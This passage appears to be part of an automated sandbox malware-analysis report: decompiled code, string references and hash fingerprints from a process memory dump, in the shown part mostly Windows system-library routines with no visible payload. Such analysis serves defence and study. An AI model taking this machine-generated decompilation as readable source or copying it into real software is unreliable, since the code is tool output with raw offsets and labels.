                    					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                    						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                    						asm("int3");
                    						 *(_t41 - 4) = 0xfffffffe;
                    					}
                    				}
                    				 *(_t41 - 4) = 1;
                    				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                    				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                    				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                    				 *((intOrPtr*)(_t41 - 0x64)) = L014BDEF0;
                    				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                    				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                    				_push(_t41 - 0x70);
                    				L014BDEF0(1, _t38);
                    				 *(_t41 - 4) = 0xfffffffe;
                    				return E014BD130(_t34, _t39, _t40);
                    			}






                    Strings
                    • Critical error detected %lx, xrefs: 01518E21
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Critical error detected %lx
                    • API String ID: 0-802127002
                    • Opcode ID: 05e0c68bb70af443ff1c3f8ff1986f65c16e900cd775de5c18686f80bdeaa412
                    • Instruction ID: 4ed4413c188001b45c3c0ebca7eadc1d6f98d26cf5a282479ef35fb01b26026a
                    • Opcode Fuzzy Hash: 05e0c68bb70af443ff1c3f8ff1986f65c16e900cd775de5c18686f80bdeaa412
                    • Instruction Fuzzy Hash: 7A113971D14348DBEB29CFA985457DDBBB1BB14318F24426EE569AB3A2C3345A02CF14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 014FFF60
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                    • API String ID: 0-1911121157
                    • Opcode ID: c65571ffd6a696443e3ee0e318c070ac2423a9eaa67f0372fc9728ee0543304a
                    • Instruction ID: bfcba7e76358073bee0ee36b2084240ea87304f17997352b283e18d64f2ccf9b
                    • Opcode Fuzzy Hash: c65571ffd6a696443e3ee0e318c070ac2423a9eaa67f0372fc9728ee0543304a
                    • Instruction Fuzzy Hash: 5411E172910244EFDB22DB54C898F997BB1FB18718F15809AE6086B3B1C7399948DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E01535BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t296;
                    				signed char _t298;
                    				signed int _t301;
                    				signed int _t306;
                    				signed int _t310;
                    				signed char _t311;
                    				intOrPtr _t312;
                    				signed int _t313;
                    				void* _t327;
                    				signed int _t328;
                    				intOrPtr _t329;
                    				intOrPtr _t333;
                    				signed char _t334;
                    				signed int _t336;
                    				void* _t339;
                    				signed int _t340;
                    				signed int _t356;
                    				signed int _t362;
                    				short _t367;
                    				short _t368;
                    				short _t373;
                    				signed int _t380;
                    				void* _t382;
                    				short _t385;
                    				signed short _t392;
                    				signed char _t393;
                    				signed int _t395;
                    				signed char _t397;
                    				signed int _t398;
                    				signed short _t402;
                    				void* _t406;
                    				signed int _t412;
                    				signed char _t414;
                    				signed short _t416;
                    				signed int _t421;
                    				signed char _t427;
                    				intOrPtr _t434;
                    				signed char _t435;
                    				signed int _t436;
                    				signed int _t442;
                    				signed int _t446;
                    				signed int _t447;
                    				signed int _t451;
                    				signed int _t453;
                    				signed int _t454;
                    				signed int _t455;
                    				intOrPtr _t456;
                    				intOrPtr* _t457;
                    				short _t458;
                    				signed short _t462;
                    				signed int _t469;
                    				intOrPtr* _t474;
                    				signed int _t475;
                    				signed int _t479;
                    				signed int _t480;
                    				signed int _t481;
                    				short _t485;
                    				signed int _t491;
                    				signed int* _t494;
                    				signed int _t498;
                    				signed int _t505;
                    				intOrPtr _t506;
                    				signed short _t508;
                    				signed int _t511;
                    				void* _t517;
                    				signed int _t519;
                    				signed int _t522;
                    				void* _t523;
                    				signed int _t524;
                    				void* _t528;
                    				signed int _t529;
                    
                    				_push(0xd4);
                    				_push(0x1541178);
                    				E014BD0E8(__ebx, __edi, __esi);
                    				_t494 = __edx;
                    				 *(_t528 - 0xcc) = __edx;
                    				_t511 = __ecx;
                    				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                    				 *(_t528 - 0xbc) = __ecx;
                    				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                    				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                    				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                    				_t427 = 0;
                    				 *(_t528 - 0x74) = 0;
                    				 *(_t528 - 0x9c) = 0;
                    				 *(_t528 - 0x84) = 0;
                    				 *(_t528 - 0xac) = 0;
                    				 *(_t528 - 0x88) = 0;
                    				 *(_t528 - 0xa8) = 0;
                    				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                    				if( *(_t528 + 0x1c) <= 0x80) {
                    					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                    					if(__eflags != 0) {
                    						_t421 = E01534C56(0, __edx, __ecx, __eflags);
                    						__eflags = _t421;
                    						if(_t421 != 0) {
                    							 *((intOrPtr*)(_t528 - 4)) = 0;
                    							E014AD000(0x410);
                    							 *(_t528 - 0x18) = _t529;
                    							 *(_t528 - 0x9c) = _t529;
                    							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                    							E01535542(_t528 - 0x9c, _t528 - 0x84);
                    						}
                    					}
                    					_t435 = _t427;
                    					 *(_t528 - 0xd0) = _t435;
                    					_t474 = _t511 + 0x65;
                    					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                    					_t511 = 0x18;
                    					while(1) {
                    						 *(_t528 - 0xa0) = _t427;
                    						 *(_t528 - 0xbc) = _t427;
                    						 *(_t528 - 0x80) = _t427;
                    						 *(_t528 - 0x78) = 0x50;
                    						 *(_t528 - 0x79) = _t427;
                    						 *(_t528 - 0x7a) = _t427;
                    						 *(_t528 - 0x8c) = _t427;
                    						 *(_t528 - 0x98) = _t427;
                    						 *(_t528 - 0x90) = _t427;
                    						 *(_t528 - 0xb0) = _t427;
                    						 *(_t528 - 0xb8) = _t427;
                    						_t296 = 1 << _t435;
                    						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                    						__eflags = _t436 & _t296;
                    						if((_t436 & _t296) != 0) {
                    							goto L92;
                    						}
                    						__eflags =  *((char*)(_t474 - 1));
                    						if( *((char*)(_t474 - 1)) == 0) {
                    							goto L92;
                    						}
                    						_t301 =  *_t474;
                    						__eflags = _t494[1] - _t301;
                    						if(_t494[1] <= _t301) {
                    							L10:
                    							__eflags =  *(_t474 - 5) & 0x00000040;
                    							if(( *(_t474 - 5) & 0x00000040) == 0) {
                    								L12:
                    								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                    								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                    									goto L92;
                    								}
                    								_t442 =  *(_t474 - 0x11) & _t494[3];
                    								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                    								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                    									goto L92;
                    								}
                    								__eflags = _t442 -  *(_t474 - 0x11);
                    								if(_t442 !=  *(_t474 - 0x11)) {
                    									goto L92;
                    								}
                    								L15:
                    								_t306 =  *(_t474 + 1) & 0x000000ff;
                    								 *(_t528 - 0xc0) = _t306;
                    								 *(_t528 - 0xa4) = _t306;
                    								__eflags =  *0x15560e8;
                    								if( *0x15560e8 != 0) {
                    									__eflags = _t306 - 0x40;
                    									if(_t306 < 0x40) {
                    										L20:
                    										asm("lock inc dword [eax]");
                    										_t310 =  *0x15560e8; // 0x0
                    										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                    										__eflags = _t311 & 0x00000001;
                    										if((_t311 & 0x00000001) == 0) {
                    											 *(_t528 - 0xa0) = _t311;
                    											_t475 = _t427;
                    											 *(_t528 - 0x74) = _t427;
                    											__eflags = _t475;
                    											if(_t475 != 0) {
                    												L91:
                    												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                    												goto L92;
                    											}
                    											asm("sbb edi, edi");
                    											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                    											_t511 = _t498;
                    											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                    											__eflags =  *(_t312 - 5) & 1;
                    											if(( *(_t312 - 5) & 1) != 0) {
                    												_push(_t528 - 0x98);
                    												_push(0x4c);
                    												_push(_t528 - 0x70);
                    												_push(1);
                    												_push(0xfffffffa);
                    												_t412 = E014A9710();
                    												_t475 = _t427;
                    												__eflags = _t412;
                    												if(_t412 >= 0) {
                    													_t414 =  *(_t528 - 0x98) - 8;
                    													 *(_t528 - 0x98) = _t414;
                    													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                    													 *(_t528 - 0x8c) = _t416;
                    													 *(_t528 - 0x79) = 1;
                    													_t511 = (_t416 & 0x0000ffff) + _t498;
                    													__eflags = _t511;
                    												}
                    											}
                    											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                    											__eflags = _t446 & 0x00000004;
                    											if((_t446 & 0x00000004) != 0) {
                    												__eflags =  *(_t528 - 0x9c);
                    												if( *(_t528 - 0x9c) != 0) {
                    													 *(_t528 - 0x7a) = 1;
                    													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                    													__eflags = _t511;
                    												}
                    											}
                    											_t313 = 2;
                    											_t447 = _t446 & _t313;
                    											__eflags = _t447;
                    											 *(_t528 - 0xd4) = _t447;
                    											if(_t447 != 0) {
                    												_t406 = 0x10;
                    												_t511 = _t511 + _t406;
                    												__eflags = _t511;
                    											}
                    											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                    											 *(_t528 - 0x88) = _t427;
                    											__eflags =  *(_t528 + 0x1c);
                    											if( *(_t528 + 0x1c) <= 0) {
                    												L45:
                    												__eflags =  *(_t528 - 0xb0);
                    												if( *(_t528 - 0xb0) != 0) {
                    													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                    													__eflags = _t511;
                    												}
                    												__eflags = _t475;
                    												if(_t475 != 0) {
                    													asm("lock dec dword [ecx+edx*8+0x4]");
                    													goto L100;
                    												} else {
                    													_t494[3] = _t511;
                    													_t451 =  *(_t528 - 0xa0);
                    													_t427 = E014A6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                    													 *(_t528 - 0x88) = _t427;
                    													__eflags = _t427;
                    													if(_t427 == 0) {
                    														__eflags = _t511 - 0xfff8;
                    														if(_t511 <= 0xfff8) {
                    															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                    															asm("sbb ecx, ecx");
                    															__eflags = (_t451 & 0x000000e2) + 8;
                    														}
                    														asm("lock dec dword [eax+edx*8+0x4]");
                    														L100:
                    														goto L101;
                    													}
                    													_t453 =  *(_t528 - 0xa0);
                    													 *_t494 = _t453;
                    													_t494[1] = _t427;
                    													_t494[2] =  *(_t528 - 0xbc);
                    													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                    													 *_t427 =  *(_t453 + 0x24) | _t511;
                    													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                    													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													__eflags =  *(_t528 + 0x14);
                    													if( *(_t528 + 0x14) == 0) {
                    														__eflags =  *[fs:0x18] + 0xf50;
                    													}
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													asm("movsd");
                    													__eflags =  *(_t528 + 0x18);
                    													if( *(_t528 + 0x18) == 0) {
                    														_t454 =  *(_t528 - 0x80);
                    														_t479 =  *(_t528 - 0x78);
                    														_t327 = 1;
                    														__eflags = 1;
                    													} else {
                    														_t146 = _t427 + 0x50; // 0x50
                    														_t454 = _t146;
                    														 *(_t528 - 0x80) = _t454;
                    														_t382 = 0x18;
                    														 *_t454 = _t382;
                    														 *((short*)(_t454 + 2)) = 1;
                    														_t385 = 0x10;
                    														 *((short*)(_t454 + 6)) = _t385;
                    														 *(_t454 + 4) = 0;
                    														asm("movsd");
                    														asm("movsd");
                    														asm("movsd");
                    														asm("movsd");
                    														_t327 = 1;
                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                    														_t479 = 0x68;
                    														 *(_t528 - 0x78) = _t479;
                    													}
                    													__eflags =  *(_t528 - 0x79) - _t327;
                    													if( *(_t528 - 0x79) == _t327) {
                    														_t524 = _t479 + _t427;
                    														_t508 =  *(_t528 - 0x8c);
                    														 *_t524 = _t508;
                    														_t373 = 2;
                    														 *((short*)(_t524 + 2)) = _t373;
                    														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                    														 *((short*)(_t524 + 4)) = 0;
                    														_t167 = _t524 + 8; // 0x8
                    														E014AF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                    														_t529 = _t529 + 0xc;
                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                    														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                    														 *(_t528 - 0x78) = _t479;
                    														_t380 =  *(_t528 - 0x80);
                    														__eflags = _t380;
                    														if(_t380 != 0) {
                    															_t173 = _t380 + 4;
                    															 *_t173 =  *(_t380 + 4) | 1;
                    															__eflags =  *_t173;
                    														}
                    														_t454 = _t524;
                    														 *(_t528 - 0x80) = _t454;
                    														_t327 = 1;
                    														__eflags = 1;
                    													}
                    													__eflags =  *(_t528 - 0xd4);
                    													if( *(_t528 - 0xd4) == 0) {
                    														_t505 =  *(_t528 - 0x80);
                    													} else {
                    														_t505 = _t479 + _t427;
                    														_t523 = 0x10;
                    														 *_t505 = _t523;
                    														_t367 = 3;
                    														 *((short*)(_t505 + 2)) = _t367;
                    														_t368 = 4;
                    														 *((short*)(_t505 + 6)) = _t368;
                    														 *(_t505 + 4) = 0;
                    														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                    														_t327 = 1;
                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                    														_t479 = _t479 + _t523;
                    														 *(_t528 - 0x78) = _t479;
                    														__eflags = _t454;
                    														if(_t454 != 0) {
                    															_t186 = _t454 + 4;
                    															 *_t186 =  *(_t454 + 4) | 1;
                    															__eflags =  *_t186;
                    														}
                    														 *(_t528 - 0x80) = _t505;
                    													}
                    													__eflags =  *(_t528 - 0x7a) - _t327;
                    													if( *(_t528 - 0x7a) == _t327) {
                    														 *(_t528 - 0xd4) = _t479 + _t427;
                    														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                    														E014AF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                    														_t529 = _t529 + 0xc;
                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                    														_t479 =  *(_t528 - 0x78) + _t522;
                    														 *(_t528 - 0x78) = _t479;
                    														__eflags = _t505;
                    														if(_t505 != 0) {
                    															_t199 = _t505 + 4;
                    															 *_t199 =  *(_t505 + 4) | 1;
                    															__eflags =  *_t199;
                    														}
                    														_t505 =  *(_t528 - 0xd4);
                    														 *(_t528 - 0x80) = _t505;
                    													}
                    													__eflags =  *(_t528 - 0xa8);
                    													if( *(_t528 - 0xa8) != 0) {
                    														_t356 = _t479 + _t427;
                    														 *(_t528 - 0xd4) = _t356;
                    														_t462 =  *(_t528 - 0xac);
                    														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                    														_t485 = 0xc;
                    														 *((short*)(_t356 + 2)) = _t485;
                    														 *(_t356 + 6) = _t462;
                    														 *((short*)(_t356 + 4)) = 0;
                    														_t211 = _t356 + 8; // 0x9
                    														E014AF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                    														E014AFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                    														_t529 = _t529 + 0x18;
                    														_t427 =  *(_t528 - 0x88);
                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                    														_t505 =  *(_t528 - 0xd4);
                    														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                    														 *(_t528 - 0x78) = _t479;
                    														_t362 =  *(_t528 - 0x80);
                    														__eflags = _t362;
                    														if(_t362 != 0) {
                    															_t222 = _t362 + 4;
                    															 *_t222 =  *(_t362 + 4) | 1;
                    															__eflags =  *_t222;
                    														}
                    													}
                    													__eflags =  *(_t528 - 0xb0);
                    													if( *(_t528 - 0xb0) != 0) {
                    														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                    														_t458 = 0xb;
                    														 *((short*)(_t479 + _t427 + 2)) = _t458;
                    														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                    														 *((short*)(_t427 + 4 + _t479)) = 0;
                    														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                    														E014AFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                    														_t529 = _t529 + 0xc;
                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                    														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                    														 *(_t528 - 0x78) = _t479;
                    														__eflags = _t505;
                    														if(_t505 != 0) {
                    															_t241 = _t505 + 4;
                    															 *_t241 =  *(_t505 + 4) | 1;
                    															__eflags =  *_t241;
                    														}
                    													}
                    													_t328 =  *(_t528 + 0x1c);
                    													__eflags = _t328;
                    													if(_t328 == 0) {
                    														L87:
                    														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                    														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                    														_t455 =  *(_t528 - 0xdc);
                    														 *(_t427 + 0x14) = _t455;
                    														_t480 =  *(_t528 - 0xa0);
                    														_t517 = 3;
                    														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                    														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                    															asm("rdtsc");
                    															 *(_t427 + 0x3c) = _t480;
                    														} else {
                    															 *(_t427 + 0x3c) = _t455;
                    														}
                    														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                    														_t456 =  *[fs:0x18];
                    														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                    														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                    														_t427 = 0;
                    														__eflags = 0;
                    														_t511 = 0x18;
                    														goto L91;
                    													} else {
                    														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                    														__eflags = _t519;
                    														 *(_t528 - 0x8c) = _t328;
                    														do {
                    															_t506 =  *((intOrPtr*)(_t519 - 4));
                    															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                    															 *(_t528 - 0xd4) =  *(_t519 - 8);
                    															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                    															__eflags =  *(_t333 + 0x36) & 0x00004000;
                    															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                    																_t334 =  *_t519;
                    															} else {
                    																_t334 = 0;
                    															}
                    															_t336 = _t334 & 0x000000ff;
                    															__eflags = _t336;
                    															_t427 =  *(_t528 - 0x88);
                    															if(_t336 == 0) {
                    																_t481 = _t479 + _t506;
                    																__eflags = _t481;
                    																 *(_t528 - 0x78) = _t481;
                    																E014AF3E0(_t479 + _t427, _t457, _t506);
                    																_t529 = _t529 + 0xc;
                    															} else {
                    																_t340 = _t336 - 1;
                    																__eflags = _t340;
                    																if(_t340 == 0) {
                    																	E014AF3E0( *(_t528 - 0xb8), _t457, _t506);
                    																	_t529 = _t529 + 0xc;
                    																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                    																} else {
                    																	__eflags = _t340 == 0;
                    																	if(_t340 == 0) {
                    																		__eflags = _t506 - 8;
                    																		if(_t506 == 8) {
                    																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                    																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                    																		}
                    																	}
                    																}
                    															}
                    															_t339 = 0x10;
                    															_t519 = _t519 + _t339;
                    															_t263 = _t528 - 0x8c;
                    															 *_t263 =  *(_t528 - 0x8c) - 1;
                    															__eflags =  *_t263;
                    															_t479 =  *(_t528 - 0x78);
                    														} while ( *_t263 != 0);
                    														goto L87;
                    													}
                    												}
                    											} else {
                    												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                    												 *(_t528 - 0xa2) = _t392;
                    												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                    												__eflags = _t469;
                    												while(1) {
                    													 *(_t528 - 0xe4) = _t511;
                    													__eflags = _t392;
                    													_t393 = _t427;
                    													if(_t392 != 0) {
                    														_t393 =  *((intOrPtr*)(_t469 + 4));
                    													}
                    													_t395 = (_t393 & 0x000000ff) - _t427;
                    													__eflags = _t395;
                    													if(_t395 == 0) {
                    														_t511 = _t511 +  *_t469;
                    														__eflags = _t511;
                    													} else {
                    														_t398 = _t395 - 1;
                    														__eflags = _t398;
                    														if(_t398 == 0) {
                    															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                    															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                    														} else {
                    															__eflags = _t398 == 1;
                    															if(_t398 == 1) {
                    																 *(_t528 - 0xa8) =  *(_t469 - 8);
                    																_t402 =  *_t469 & 0x0000ffff;
                    																 *(_t528 - 0xac) = _t402;
                    																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                    															}
                    														}
                    													}
                    													__eflags = _t511 -  *(_t528 - 0xe4);
                    													if(_t511 <  *(_t528 - 0xe4)) {
                    														break;
                    													}
                    													_t397 =  *(_t528 - 0x88) + 1;
                    													 *(_t528 - 0x88) = _t397;
                    													_t469 = _t469 + 0x10;
                    													__eflags = _t397 -  *(_t528 + 0x1c);
                    													_t392 =  *(_t528 - 0xa2);
                    													if(_t397 <  *(_t528 + 0x1c)) {
                    														continue;
                    													}
                    													goto L45;
                    												}
                    												_t475 = 0x216;
                    												 *(_t528 - 0x74) = 0x216;
                    												goto L45;
                    											}
                    										} else {
                    											asm("lock dec dword [eax+ecx*8+0x4]");
                    											goto L16;
                    										}
                    									}
                    									_t491 = E01534CAB(_t306, _t528 - 0xa4);
                    									 *(_t528 - 0x74) = _t491;
                    									__eflags = _t491;
                    									if(_t491 != 0) {
                    										goto L91;
                    									} else {
                    										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                    										goto L20;
                    									}
                    								}
                    								L16:
                    								 *(_t528 - 0x74) = 0x1069;
                    								L93:
                    								_t298 =  *(_t528 - 0xd0) + 1;
                    								 *(_t528 - 0xd0) = _t298;
                    								_t474 = _t474 + _t511;
                    								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                    								_t494 = 4;
                    								__eflags = _t298 - _t494;
                    								if(_t298 >= _t494) {
                    									goto L100;
                    								}
                    								_t494 =  *(_t528 - 0xcc);
                    								_t435 = _t298;
                    								continue;
                    							}
                    							__eflags = _t494[2] | _t494[3];
                    							if((_t494[2] | _t494[3]) == 0) {
                    								goto L15;
                    							}
                    							goto L12;
                    						}
                    						__eflags = _t301;
                    						if(_t301 != 0) {
                    							goto L92;
                    						}
                    						goto L10;
                    						L92:
                    						goto L93;
                    					}
                    				} else {
                    					_push(0x57);
                    					L101:
                    					return E014BD130(_t427, _t494, _t511);
                    				}
                    			}











































































                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d204ab31096e12d8fc4b233014852aa9403b326b41ff315d57494162df2bd9c6
                    • Instruction ID: 46cccffb226569b98cc42fae12872d5b714e531116afb728a9a674f59600d308
                    • Opcode Fuzzy Hash: d204ab31096e12d8fc4b233014852aa9403b326b41ff315d57494162df2bd9c6
                    • Instruction Fuzzy Hash: 7D425975910229DFDB24CF68C880BADBBB1FF85304F1585AED94DAB242E7349A85CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                    • Instruction ID: d3092c495ac0754ce1111ea852ffe29c91c3cd30e8224ecfe5415c9edbb0377a
                    • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                    • Instruction Fuzzy Hash: 8B21837160011AEFDF11DF59CC80E6BBFBDEF95A60F154056EA0597620D634AD01CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 697b0d5d7c7f71a0e68fd92e8f6f8a783b12dc249bff4a4b50248c8a8c524dfa
                    • Instruction ID: f64b29bdac5bffc17e6f96fbeab68a0ca9ac1b51ea9725e9cc51d916f09543b8
                    • Opcode Fuzzy Hash: 697b0d5d7c7f71a0e68fd92e8f6f8a783b12dc249bff4a4b50248c8a8c524dfa
                    • Instruction Fuzzy Hash: 5A31BF71211B04CFD722DF28D840B5BB7E5FF89714F14456EE59A877A0DB35A806CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ee7184ad9d3851a7963418b7a9ce5186bb360c539fdae3e98e3253a8628cad95
                    • Instruction ID: 77971e0c156e17e091cd2b9e909207f50d9ab96c0778d9dc88f316601f4d0c0b
                    • Opcode Fuzzy Hash: ee7184ad9d3851a7963418b7a9ce5186bb360c539fdae3e98e3253a8628cad95
                    • Instruction Fuzzy Hash: E7219A71A00645ABD711DF69D884E2AB7E8FF68700F1500AAF908DB7A0E634E951CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                    • Instruction ID: 5be35925a3c748f4e7744bb4c777ca5713eedac0190d11f20c33fb89f4d46642
                    • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                    • Instruction Fuzzy Hash: C8217171A40205EFEB21DF59C444A9ABBF8EB64754F15847FE989A7320D330A9008B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eb870bc9ec47761e0b608dc5f8c97d845ee2e85ce020f4062c904f30be5d63ae
                    • Instruction ID: 4514f6644db5352ad36f08d88d31155fdfbbd746fd2680a38fa1edd1c542776a
                    • Opcode Fuzzy Hash: eb870bc9ec47761e0b608dc5f8c97d845ee2e85ce020f4062c904f30be5d63ae
                    • Instruction Fuzzy Hash: 0C218072600605EFCB10DF99CD91F6ABBBDFB44708F260069EA08AB261D371ED05DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 865184a94fe58572203d5a0474fc87e13d53371aa669e73ecaf1d65c790264e6
                    • Instruction ID: 7a3c4f4ea46771bb6d5140f16fe631aa10cd1fda4e03839bb90041b70d42e0bc
                    • Opcode Fuzzy Hash: 865184a94fe58572203d5a0474fc87e13d53371aa669e73ecaf1d65c790264e6
                    • Instruction Fuzzy Hash: CE2100724003499BD711EF2DC948F6BBBECAFA1640F05096BBA40C7271E735C94AC6A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
